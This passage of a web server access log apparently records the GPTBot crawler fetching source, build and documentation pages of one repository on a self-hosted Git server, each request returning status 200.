192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/controller-cpp2.md" +[17/Feb/2026:15:12:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build" [Client 74.7.227.38] [Length 10527] [Gzip 3.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm" +[17/Feb/2026:15:12:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build" [Client 74.7.227.38] [Length 10512] [Gzip 3.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm" +[17/Feb/2026:15:12:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/cpp" [Client 74.7.227.38] [Length 9926] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/cpp" +[17/Feb/2026:15:12:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/cpp" [Client 74.7.227.38] [Length 9927] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/cpp" +[17/Feb/2026:15:12:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/.vscode" [Client 74.7.227.38] [Length 9913] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/.vscode" +[17/Feb/2026:15:12:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/CMakeLists.txt" [Client 74.7.227.38] [Length 11356] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm" +[17/Feb/2026:15:12:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/CMakeLists.txt" [Client 74.7.227.38] [Length 11357] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm" +[17/Feb/2026:15:12:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/controller-cpp.md" [Client 74.7.227.38] [Length 468113] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/controller-cpp.md" +[17/Feb/2026:15:12:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/controller-cpp.md" [Client 74.7.227.38] [Length 468113] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/controller-cpp.md" +[17/Feb/2026:15:12:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/controller-cpp.md" [Client 74.7.227.38] [Length 468113] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/controller-cpp.md" +[17/Feb/2026:15:12:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/controller-cpp.md" [Client 74.7.227.38] [Length 468113] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/controller-cpp.md" +[17/Feb/2026:15:12:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeFiles" [Client 74.7.227.38] [Length 10486] [Gzip 3.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build" +[17/Feb/2026:15:13:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeFiles" [Client 74.7.227.38] [Length 10483] [Gzip 3.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build" +[17/Feb/2026:15:13:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/.vscode" [Client 74.7.227.38] [Length 10146] [Gzip 2.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project" +[17/Feb/2026:15:13:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/.vscode" [Client 74.7.227.38] [Length 10144] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project" +[17/Feb/2026:15:13:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm" [Client 74.7.227.38] [Length 10502] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project" +[17/Feb/2026:15:13:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/CMakeLists.txt" [Client 74.7.227.38] [Length 10418] [Gzip 3.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/CMakeLists.txt" +[17/Feb/2026:15:13:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/CMakeLists.txt" [Client 74.7.227.38] [Length 10419] [Gzip 3.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/CMakeLists.txt" +[17/Feb/2026:15:13:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/CMakeLists.txt" [Client 74.7.227.38] [Length 162] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/CMakeLists.txt" +[17/Feb/2026:15:13:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/CMakeLists.txt" [Client 74.7.227.38] [Length 162] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/CMakeLists.txt" +[17/Feb/2026:15:13:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm" [Client 74.7.227.38] [Length 10505] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project" +[17/Feb/2026:15:13:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm" [Client 74.7.227.38] [Length 10505] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project" +[17/Feb/2026:15:13:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 11261] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeFiles" +[17/Feb/2026:15:13:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 21046] [Gzip 6.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeFiles" +[17/Feb/2026:15:13:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/.vscode" [Client 74.7.227.38] [Length 9918] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/.vscode" +[17/Feb/2026:15:13:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/.vscode" [Client 74.7.227.38] [Length 9912] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/.vscode" +[17/Feb/2026:15:13:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp" [Client 74.7.227.38] [Length 10861] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm" +[17/Feb/2026:15:13:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build" [Client 74.7.227.38] [Length 10697] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm" +[17/Feb/2026:15:13:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 21046] [Gzip 6.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeFiles" +[17/Feb/2026:15:13:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 11257] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeFiles" +[17/Feb/2026:15:13:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/CMakeLists.txt" [Client 74.7.227.38] [Length 11357] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm" +[17/Feb/2026:15:13:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp" [Client 74.7.227.38] [Length 10862] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm" +[17/Feb/2026:15:13:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp" [Client 74.7.227.38] [Length 10860] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm" +[17/Feb/2026:15:13:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build" [Client 74.7.227.38] [Length 10695] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm" +[17/Feb/2026:15:13:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 9978] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" +[17/Feb/2026:15:13:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build" [Client 74.7.227.38] [Length 10705] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm" +[17/Feb/2026:15:13:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 9960] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" +[17/Feb/2026:15:13:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp" [Client 74.7.227.38] [Length 10404] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp" +[17/Feb/2026:15:13:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 10280] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" +[17/Feb/2026:15:13:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 9973] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" +[17/Feb/2026:15:13:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 9958] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" +[17/Feb/2026:15:13:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/CMakeLists.txt" [Client 74.7.227.38] [Length 10418] [Gzip 3.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/CMakeLists.txt" +[17/Feb/2026:15:13:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp" [Client 74.7.227.38] [Length 10404] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp" +[17/Feb/2026:15:13:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp" [Client 74.7.227.38] [Length 10404] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp" +[17/Feb/2026:15:13:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 10281] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" +[17/Feb/2026:15:13:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 25622] [Gzip 11.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" +[17/Feb/2026:15:13:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 25627] [Gzip 11.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" +[17/Feb/2026:15:13:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 427] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" +[17/Feb/2026:15:13:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 427] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" +[17/Feb/2026:15:13:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 26816] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" +[17/Feb/2026:15:13:20 +0000] - 200 200 